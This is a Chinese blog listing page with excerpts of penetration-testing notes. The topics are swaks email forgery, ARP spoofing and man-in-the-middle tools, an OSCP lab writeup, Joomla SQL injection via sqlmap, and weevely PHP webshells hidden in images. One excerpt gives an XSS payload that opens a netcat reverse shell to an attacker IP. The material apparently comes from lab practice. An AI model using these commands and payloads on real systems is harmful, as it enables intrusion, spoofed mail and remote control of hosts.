网络安全
文章平均质量分 54
地球上的星际旅客
这个作者很懒,什么都没留下…
展开
-
kali邮件发送
伪造邮件发送swaks工具伪造邮件发送swaks工具伪造邮件发送#发送一条信息swaks --body "内容" --header "Subject:标题" -t xxxxx@qq.com -f "admin@local.com"#测试是否能够连接swaks -q rcpt -t 邮件地址-t –to 目标地址 -t test@test.com-f –from 来源地址 (发件人) -f "text<text@text.com>"-h –helo 邮件头(不明)–body原创 2021-03-02 16:21:29 · 1577 阅读 · 0 评论 -
局域网渗透测试篇
局域网渗透测试篇-链接上wifi以后的骚操作中间人攻击arpspoof&&driftnet篇driftnet软件参数详解ettercap进行arp攻击mitmf注入脚本(XSS)kali使用密文直接登录pth-winexe工具中间人攻击arpspoof&&driftnet篇arpspoof详解#安装dsniff(arpspoof是dsniff集成的一个工具)和driftnetapt-get install dsniffapt-get install driftne原创 2021-03-01 23:57:26 · 1087 阅读 · 0 评论 -
vulhub上oscp InfoSec靶机渗透测试writeup
这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的原创 2021-02-05 13:12:28 · 949 阅读 · 0 评论 -
渗透测试思路总结
这里写目录标题访问受限域名访问限制反弹shellxss漏洞中的反弹shell军刀中的反弹shell获取用户名和密码提权软件漏洞提权系统漏洞提权访问受限域名访问限制解决方案一:添加域名解析vim hosts10.10.10.209 doctors.htb反弹shellxss漏洞中的反弹shell<img src=http://10.10.14.3/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.3'$IFS'1234')>军刀原创 2021-02-03 10:16:27 · 2391 阅读 · 1 评论 -
Joomla漏洞利用
这里写目录标题漏洞扫描Joomla3.7.0有一个sql注入漏洞Join hash文件登陆Joomla管理控制台以后的利用蚁剑链接,反弹shell提权漏洞扫描joomscan -u http://192.168.1.24/Joomla3.7.0有一个sql注入漏洞//--dbs 可变参数部分,通过更改这个参数来获取数据库,表,用户密码sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout原创 2021-02-01 21:29:55 · 873 阅读 · 1 评论 -
创建ssh key
这里写目录标题密码创建密码创建创建密钥对ssh-keygen -o -t rsa -C "your.email@example.com" -b 4096将公钥加入主机ssh-add ~/.ssh/other_id_rsa原创 2021-01-29 13:17:42 · 96 阅读 · 0 评论 -
kali系统中使用weevely创建木马(合并成图片木马)
这里写目录标题weevely:kali中的军刀图片木马weevely:kali中的军刀创建木马:weevely generate <password> filename.php连接木马:weevely [url] <password>图片木马windows环境制作木马之copy命令copy image.png/b + muma.php picmuma.pnglinux环境制作木马之cat命令cat image.png muma.php > picmum原创 2021-01-29 13:09:00 · 7059 阅读 · 3 评论